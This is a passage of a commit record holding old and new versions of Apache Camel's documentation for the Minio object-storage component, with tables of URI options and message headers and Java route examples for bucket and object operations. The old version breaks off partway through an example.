listObjects\n\n|`CamelMinioStorageClass` |`String` |The storage class of this object.\n\n|`CamelMinioCannedAcl` |`String` |The canned acl that will be applied to the object. see\n`com.amazonaws.services.s3.model.CannedAccessControlList` for allowed\nvalues.\n\n\/\/|`CamelMinioHeaders` |`Map<String,String>` |Support to get or set custom objectMetadata headers.\n\n|`CamelMinioServerSideEncryption` |String |Sets the server-side encryption algorithm when encrypting\nthe object using Minio-managed keys. For example use AES256.\n\n|`CamelMinioVersionId` |`String` |The version Id of the object to be stored or returned from the current operation\n|=======================================================================\n\n=== Message headers set by the Minio producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n|`CamelMinioETag` |`String` |The ETag value for the newly uploaded object.\n\n|`CamelMinioVersionId` |`String` |The *optional* version ID of the newly uploaded object.\n\n\/\/|`CamelMinioDownloadLinkExpiration` | `String` | The expiration (millis) of URL download link. The link will be stored into *CamelMinioDownloadLink* response header.\n\n|=======================================================================\n\n=== Message headers set by the Minio consumer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelMinioObjectName` |`String` |The key under which this object is stored.\n\n|`CamelMinioBucketName` |`String` |The name of the bucket in which this object is contained.\n\n|`CamelMinioETag` |`String` |The hex encoded 128-bit MD5 digest of the associated object according to\nRFC 1864. This data is used as an integrity check to verify that the\ndata received by the caller is the same data that was sent by Minio\n\n|`CamelMinioLastModified` |`Date` |The value of the Last-Modified header, indicating the date and time at\nwhich Minio last recorded a modification to the associated object.\n\n|`CamelMinioVersionId` |`String` |The version ID of the associated Minio object if available. Version\nIDs are only assigned to objects when an object is uploaded to an Minio bucket that has object versioning enabled.\n\n|`CamelMinioContentType` |`String` |The Content-Type HTTP header, which indicates the type of content stored\nin the associated object. The value of this header is a standard MIME\ntype.\n\n|`CamelMinioContentMD5` |`String` |The base64 encoded 128-bit MD5 digest of the associated object (content\n- not including headers) according to RFC 1864. This data is used as a\nmessage integrity check to verify that the data received by Minio is\nthe same data that the caller sent.\n\n|`CamelMinioContentLength` |`Long` |The Content-Length HTTP header indicating the size of the associated\nobject in bytes.\n\n|`CamelMinioContentEncoding` |`String` |The *optional* Content-Encoding HTTP header specifying what content\nencodings have been applied to the object and what decoding mechanisms\nmust be applied in order to obtain the media-type referenced by the\nContent-Type field.\n\n|`CamelMinioContentDisposition` |`String` |The *optional* Content-Disposition HTTP header, which specifies\npresentational information such as the recommended filename for the\nobject to be saved as.\n\n|`CamelMinioContentControl` |`String` |The *optional* Cache-Control HTTP header which allows the user to\nspecify caching behavior along the HTTP request\/reply chain.\n\n|`CamelMinioServerSideEncryption` |String |The server-side encryption algorithm when encrypting the\nobject using Minio-managed keys.\n|=======================================================================\n\n=== Minio Producer operations\n\nCamel-Minio component provides the following operation on the producer side:\n\n- copyObject\n- deleteObject\n- deleteObjects\n- listBuckets\n- deleteBucket\n- listObjects\n- getObject (this will return a MinioObject instance)\n- getObjectRange (this will return a MinioObject instance)\n\n=== Advanced Minio configuration\n\nIf your Camel Application is running behind a firewall or if you need to\nhave more control over the `MinioClient` instance configuration, you can\ncreate your own instance and refer to it in your Camel minio component configuration:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"minio:\/\/MyBucket?minioClient=#client&delay=5000&maxMessagesPerPoll=5\")\n.to(\"mock:result\");\n--------------------------------------------------------------------------------\n\n=== Minio Producer Operation examples\n\n- CopyObject: this operation copy an object from one bucket to a different one\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.DESTINATION_BUCKET_NAME, \"camelDestinationBucket\");\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n exchange.getIn().setHeader(MinioConstants.DESTINATION_OBJECT_NAME, \"camelDestinationKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=copyObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will copy the object with the name expressed in the header camelDestinationKey to the camelDestinationBucket bucket, from the bucket mycamelbucket.\n\n- DeleteObject: this operation deletes an object from a bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=deleteObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the object camelKey from the bucket mycamelbucket.\n\n- ListBuckets: this operation list the buckets for this account in this region\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=listBuckets\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the buckets for this account\n\n- DeleteBucket: this operation delete the bucket specified as URI parameter or header\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=deleteBucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the bucket mycamelbucket\n\n- ListObjects: this operation list object in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=listObjects\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the objects in the mycamelbucket bucket\n\n- GetObject: this operation get a single object in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=getObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an MinioObject instance related to the camelKey object in mycamelbucket bucket.\n\n- GetObjectRange: this operation get a single object range in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.OBJECT_NAME, \"camelKey\");\n exchange.getIn().setHeader(MinioConstants.OFFSET, \"0\");\n exchange.getIn().setHeader(MinioConstants.LENGTH, \"9\");\n }\n })\n .to(\"minio:\/\/mycamelbucket?minioClient=#minioClient&operation=getObjectRange\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an MinioObject instance related to the camelKey object in mycamelbucket bucket, containing bytes from 0 to 9.\n\n== Bucket Autocreation\n\nWith the option `autoCreateBucket` users are able to avoid the autocreation of a Minio Bucket in case it doesn't exist. The default for this option is `true`.\nIf set to false any operation on a not-existent bucket in Minio won't be successful, and an error will be returned.\n\n== Automatic detection of Minio client in registry\n\nThe component is capable of detecting the presence of a Minio bean into the registry.\nIf it's the only instance of that type it will be used as client, and you won't have to define it as uri parameter, like the example above.\nThis may be really useful for smarter configuration of the endpoint.\n\n== Moving stuff between a bucket and another bucket\n\nSome users like to consume stuff from a bucket and move the content in a different one without using the copyObject feature of this component.\nIf this is case for you, don't forget to remove the bucketName header from the incoming exchange of the consumer, otherwise the file will always be overwritten on the same\noriginal bucket.\n\n== MoveAfterRead consumer option\n\nIn addition to deleteAfterRead it has been added another option, moveAfterRead. With this option enabled the consumed object will be moved to a target destinationBucket instead of being only deleted.\nThis will require specifying the destinationBucket option. As example:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"minio:\/\/mycamelbucket?minioClient=#minioClient&moveAfterRead=true&destinationBucketName=myothercamelbucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to myothercamelbucket bucket and deleted from the original one (because of deleteAfterRead set to true as default).\n\n== Using a POJO as body\n\nSometimes build a Minio Request can be complex, because of multiple options. We introduce the possibility to use a POJO as body.\nIn Minio there are multiple operations you can submit, as an example for List brokers request, you can do something like:\n\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:minio\")\n .setBody(ListObjectsArgs.builder()\n .bucket(bucketName)\n .recursive(getConfiguration().isRecursive())))\n .to(\"minio:\/\/test?minioClient=#minioClient&operation=listObjects&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly without the need of passing headers and options specifically related to this operation.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-minio<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version}` must be replaced by the actual version of Camel.\n\ninclude::camel-spring-boot::page$minio-starter.adoc[]","old_contents":"[[minio-component]]\n= Minio Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: components\/camel-minio\/src\/main\/docs\/minio-component.adoc\n:docTitle: Minio\n:artifactId: camel-minio\n:description: Store and retrieve objects from Minio Storage Service using Minio SDK.\n:since: 3.5\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\ninclude::{cq-version}@camel-quarkus:ROOT:partial$reference\/components\/minio.adoc[opts=optional]\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Minio component supports storing and retrieving objects from\/to\nhttps:\/\/min.io\/[Minio] service.\n\nPrerequisites\n\nYou must have valid credentials for authorized access to the buckets\/folders. More information is available at\nhttps:\/\/min.io\/[Minio].\n\n== URI Format\n\n[source,java]\n------------------------------\nminio:\/\/bucketName[?options]\n------------------------------\n\nThe bucket will be created if it doesn't already exist. +\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\nFor example in order to read file `hello.txt` from the bucket `helloBucket`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"minio:\/\/helloBucket?accessKey=yourAccessKey&secretKey=yourSecretKey&prefix=hello.txt\")\n .to(\"file:\/var\/downloaded\");\n--------------------------------------------------------------------------------\n\n== URI Options\n\n\/\/ component options: START\nThe Minio component supports 47 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoCreateBucket* (common) | Setting the autocreation of the bucket if bucket name not exist. | true | boolean\n| *configuration* (common) | The component configuration | | MinioConfiguration\n| *customHttpClient* (common) | Set custom HTTP client for authenticated access. | | OkHttpClient\n| *endpoint* (common) | Endpoint can be an URL, domain name, IPv4 address or IPv6 address. | | String\n| *minioClient* (common) | *Autowired* Reference to a Minio Client object in the registry. | | MinioClient\n| *objectLock* (common) | Set when creating new bucket. | false | boolean\n| *policy* (common) | The policy for this queue to set in the method. | | String\n| *proxyPort* (common) | TCP\/IP port number. 80 and 443 are used as defaults for HTTP and HTTPS. | | Integer\n| *region* (common) | The region in which Minio client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1). You'll need to use the name Region.EU_WEST_1.id() | | String\n| *secure* (common) | Flag to indicate to use secure connection to minio service or not. | false | boolean\n| *serverSideEncryption* (common) | Server-side encryption. | | ServerSideEncryption\n| *serverSideEncryptionCustomer{zwsp}Key* (common) | Server-side encryption for source object while copy\/move objects. | | ServerSideEncryptionCustomerKey\n| *autoCloseBody* (consumer) | If this option is true and includeBody is true, then the MinioObject.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *bypassGovernanceMode* (consumer) | Set this flag if you want to bypassGovernanceMode when deleting a particular object. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from Minio after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the MinioConstants#BUCKET_NAME and MinioConstants#OBJECT_NAME headers, or only the MinioConstants#OBJECT_NAME header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucketName* (consumer) | Source bucket name. | | String\n| *destinationObjectName* (consumer) | Source object name. | | String\n| *includeBody* (consumer) | If it is true, the exchange body will be set to a stream to the contents of the file. If false, the headers will be set with the Minio object metadata, but the body will be null. This option is strongly related to autocloseBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *includeFolders* (consumer) | The flag which is used in the ListObjectsRequest to set include folders. | false | boolean\n| *includeUserMetadata* (consumer) | The flag which is used in the ListObjectsRequest to get objects with user meta data. | false | boolean\n| *includeVersions* (consumer) | The flag which is used in the ListObjectsRequest to get objects with versioning. | false | boolean\n| *length* (consumer) | Number of bytes of object data from offset. | | long\n| *matchETag* (consumer) | Set match ETag parameter for get object(s). | | String\n| *maxConnections* (consumer) | Set the maxConnections parameter in the minio client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *modifiedSince* (consumer) | Set modified since parameter for get object(s). | | ZonedDateTime\n| *moveAfterRead* (consumer) | Move objects from bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *notMatchETag* (consumer) | Set not match ETag parameter for get object(s). | | String\n| *objectName* (consumer) | To get the object from the bucket with the given object name. | | String\n| *offset* (consumer) | Start byte position of object data. | | long\n| *prefix* (consumer) | Object name starts with prefix. | | String\n| *recursive* (consumer) | List recursively than directory structure emulation. | false | boolean\n| *startAfter* (consumer) | list objects in bucket after this object name. | | String\n| *unModifiedSince* (consumer) | Set un modified since parameter for get object(s). | | ZonedDateTime\n| *useVersion1* (consumer) | when true, version 1 of REST API is used. | false | boolean\n| *versionId* (consumer) | Set specific version_ID of a object when deleting the object. | | String\n| *deleteAfterWrite* (producer) | Delete file object after the Minio file has been uploaded. | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteObjects, deleteBucket, listBuckets, getObject, getObjectRange | | MinioOperations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not. | false | boolean\n| *storageClass* (producer) | The storage class to set in the request. | | String\n| *autowiredEnabled* (advanced) | Whether autowiring is enabled. This is used for automatic autowiring options (the option must be marked as autowired) by looking up in the registry to find if there is a single instance of matching type, which then gets configured on the component. This can be used for automatic configuring JDBC data sources, JMS connection factories, AWS Clients, etc. | true | boolean\n| *accessKey* (security) | Amazon AWS Secret Access Key or Minio Access Key. If not set camel will connect to service for anonymous access. | | String\n| *secretKey* (security) | Amazon AWS Access Key Id or Minio Secret Key. If not set camel will connect to service for anonymous access. | | String\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\nThe Minio endpoint is configured using URI syntax:\n\n----\nminio:bucketName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bucketName* | *Required* Bucket name | | String\n|===\n\n\n=== Query Parameters (64 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoCreateBucket* (common) | Setting the autocreation of the bucket if bucket name not exist. | true | boolean\n| *customHttpClient* (common) | Set custom HTTP client for authenticated access. | | OkHttpClient\n| *endpoint* (common) | Endpoint can be an URL, domain name, IPv4 address or IPv6 address. | | String\n| *minioClient* (common) | *Autowired* Reference to a Minio Client object in the registry. | | MinioClient\n| *objectLock* (common) | Set when creating new bucket. | false | boolean\n| *policy* (common) | The policy for this queue to set in the method. | | String\n| *proxyPort* (common) | TCP\/IP port number. 80 and 443 are used as defaults for HTTP and HTTPS. | | Integer\n| *region* (common) | The region in which Minio client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1). You'll need to use the name Region.EU_WEST_1.id() | | String\n| *secure* (common) | Flag to indicate to use secure connection to minio service or not. | false | boolean\n| *serverSideEncryption* (common) | Server-side encryption. | | ServerSideEncryption\n| *serverSideEncryptionCustomer{zwsp}Key* (common) | Server-side encryption for source object while copy\/move objects. | | ServerSideEncryptionCustomerKey\n| *autoCloseBody* (consumer) | If this option is true and includeBody is true, then the MinioObject.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *bypassGovernanceMode* (consumer) | Set this flag if you want to bypassGovernanceMode when deleting a particular object. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from Minio after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the MinioConstants#BUCKET_NAME and MinioConstants#OBJECT_NAME headers, or only the MinioConstants#OBJECT_NAME header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucketName* (consumer) | Source bucket name. | | String\n| *destinationObjectName* (consumer) | Source object name. | | String\n| *includeBody* (consumer) | If it is true, the exchange body will be set to a stream to the contents of the file. If false, the headers will be set with the Minio object metadata, but the body will be null. This option is strongly related to autocloseBody option. In case of setting includeBody to true and autocloseBody to false, it will be up to the caller to close the MinioObject stream. Setting autocloseBody to true, will close the MinioObject stream automatically. | true | boolean\n| *includeFolders* (consumer) | The flag which is used in the ListObjectsRequest to set include folders. | false | boolean\n| *includeUserMetadata* (consumer) | The flag which is used in the ListObjectsRequest to get objects with user meta data. | false | boolean\n| *includeVersions* (consumer) | The flag which is used in the ListObjectsRequest to get objects with versioning. | false | boolean\n| *length* (consumer) | Number of bytes of object data from offset. | | long\n| *matchETag* (consumer) | Set match ETag parameter for get object(s). | | String\n| *maxConnections* (consumer) | Set the maxConnections parameter in the minio client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *modifiedSince* (consumer) | Set modified since parameter for get object(s). | | ZonedDateTime\n| *moveAfterRead* (consumer) | Move objects from bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *notMatchETag* (consumer) | Set not match ETag parameter for get object(s). | | String\n| *objectName* (consumer) | To get the object from the bucket with the given object name. | | String\n| *offset* (consumer) | Start byte position of object data. | | long\n| *prefix* (consumer) | Object name starts with prefix. | | String\n| *recursive* (consumer) | List recursively than directory structure emulation. | false | boolean\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *startAfter* (consumer) | list objects in bucket after this object name. | | String\n| *unModifiedSince* (consumer) | Set un modified since parameter for get object(s). | | ZonedDateTime\n| *useVersion1* (consumer) | when true, version 1 of REST API is used. | false | boolean\n| *versionId* (consumer) | Set specific version_ID of a object when deleting the object. | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. There are 3 enums and the value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *deleteAfterWrite* (producer) | Delete file object after the Minio file has been uploaded. | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteObjects, deleteBucket, listBuckets, getObject, getObjectRange | | MinioOperations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not. | false | boolean\n| *storageClass* (producer) | The storage class to set in the request. | | String\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. There are 6 enums and the value can be one of: TRACE, DEBUG, INFO, WARN, ERROR, OFF | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component. Use value spring or quartz for built in scheduler | none | Object\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. There are 7 enums and the value can be one of: NANOSECONDS, MICROSECONDS, MILLISECONDS, SECONDS, MINUTES, HOURS, DAYS | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *accessKey* (security) | Amazon AWS Secret Access Key or Minio Access Key. If not set camel will connect to service for anonymous access. | | String\n| *secretKey* (security) | Amazon AWS Access Key Id or Minio Secret Key. If not set camel will connect to service for anonymous access. | | String\n|===\n\/\/ endpoint options: END\n\nRequired Minio component options\n\nYou have to provide the minioClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/min.io\/[Minio].\n\n== Batch Consumer\n\nThis component implements the Batch Consumer.\n\nThis allows you for instance to know how many messages exists in this\nbatch and for instance let the Aggregator\naggregate this number of messages.\n\n== Usage\n\n=== Message headers evaluated by the Minio producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\"]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelMinioBucketName` |`String` |The bucket Name which this object will be stored or which will be used for the current operation\n\n|`CamelMinioDestinationBucketName` |`String` |The bucket Destination Name which will be used for the current operation\n\n|`CamelMinioContentLength` |`Long` |The content length of this object.\n\n|`CamelMinioContentType` |`String` |The content type of this object.\n\n|`CamelMinioContentControl` |`String` |The content control of this object.\n\n|`CamelMinioContentDisposition` |`String` |The content disposition of this object.\n\n|`CamelMinioContentEncoding` |`String` |The content encoding of this object.\n\n|`CamelMinioContentMD5` |`String` |The md5 checksum of this object.\n\n|`CamelMinioDestinationObjectName` |`String` |The Destination key which will be used for the current operation\n\n|`CamelMinioObjectName` |`String` |The key under which this object will be stored or which will be used for the current operation\n\n|`CamelMinioLastModified` |`java.util.Date` |The last modified timestamp of this object.\n\n|`CamelMinioOperation` |`String` |The operation to perform. Permitted values are copyObject, deleteObject, deleteObjects, listBuckets, deleteBucket, downloadLink, listObjects\n\n|`CamelMinioStorageClass` |`String` |The storage class of this object.\n\n|`CamelMinioCannedAcl` |`String` |The canned acl that will be applied to the object. see\n`com.amazonaws.services.s3.model.CannedAccessControlList` for allowed\nvalues.\n\n\/\/|`CamelMinioHeaders` |`Map<String,String>` |Support to get or set custom objectMetadata headers.\n\n|`CamelMinioServerSideEncryption` |String |Sets the server-side encryption algorithm when encrypting\nthe object using Minio-managed keys. For example use AES256.\n\n|`CamelMinioVersionId` |`String` |The version Id of the object to be stored or returned from the current operation\n|=======================================================================\n\n=== Message headers set by the Minio producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n|`CamelMinioETag` |`String` |The ETag value for the newly uploaded object.\n\n|`CamelMinioVersionId` |`String` |The *optional* version ID of the newly uploaded object.\n\n\/\/|`CamelMinioDownloadLinkExpiration` | `String` | The expiration (millis) of URL download link. The link will be stored into *CamelMinioDownloadLink* response header.\n\n|=======================================================================\n\n=== Message headers set by the Minio consumer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelMinioObjectName` |`String` |The key under which this object is stored.\n\n|`CamelMinioBucketName` |`String` |The name of the bucket in which this object is contained.\n\n|`CamelMinioETag` |`String` |The hex encoded 128-bit MD5 digest of the associated object according to\nRFC 1864. This data is used as an integrity check to verify that the\ndata received by the caller is the same data that was sent by Minio\n\n|`CamelMinioLastModified` |`Date` |The value of the Last-Modified header, indicating the date and time at\nwhich Minio last recorded a modification to the associated object.\n\n|`CamelMinioVersionId` |`String` |The version ID of the associated Minio object if available. Version\nIDs are only assigned to objects when an object is uploaded to an Minio bucket that has object versioning enabled.\n\n|`CamelMinioContentType` |`String` |The Content-Type HTTP header, which indicates the type of content stored\nin the associated object. The value of this header is a standard MIME\ntype.\n\n|`CamelMinioContentMD5` |`String` |The base64 encoded 128-bit MD5 digest of the associated object (content\n- not including headers) according to RFC 1864. This data is used as a\nmessage integrity check to verify that the data received by Minio is\nthe same data that the caller sent.\n\n|`CamelMinioContentLength` |`Long` |The Content-Length HTTP header indicating the size of the associated\nobject in bytes.\n\n|`CamelMinioContentEncoding` |`String` |The *optional* Content-Encoding HTTP header specifying what content\nencodings have been applied to the object and what decoding mechanisms\nmust be applied in order to obtain the media-type referenced by the\nContent-Type field.\n\n|`CamelMinioContentDisposition` |`String` |The *optional* Content-Disposition HTTP header, which specifies\npresentational information such as the recommended filename for the\nobject to be saved as.\n\n|`CamelMinioContentControl` |`String` |The *optional* Cache-Control HTTP header which allows the user to\nspecify caching behavior along the HTTP request\/reply chain.\n\n|`CamelMinioServerSideEncryption` |String |The server-side encryption algorithm when encrypting the\nobject using Minio-managed keys.\n|=======================================================================\n\n=== Minio Producer operations\n\nCamel-Minio component provides the following operation on the producer side:\n\n- copyObject\n- deleteObject\n- deleteObjects\n- listBuckets\n- deleteBucket\n- listObjects\n- getObject (this will return a MinioObject instance)\n- getObjectRange (this will return a MinioObject instance)\n\n=== Advanced Minio configuration\n\nIf your Camel Application is running behind a firewall or if you need to\nhave more control over the `MinioClient` instance configuration, you can\ncreate your own instance and refer to it in your Camel minio component configuration:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"minio:\/\/MyBucket?minioClient=#client&delay=5000&maxMessagesPerPoll=5\")\n.to(\"mock:result\");\n--------------------------------------------------------------------------------\n\n=== Minio Producer Operation examples\n\n- CopyObject: this operation copy an object from one bucket to a different one\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(MinioConstants.DESTINATION_BUCKET_NAME, \"camelDestinationBucket\");\n 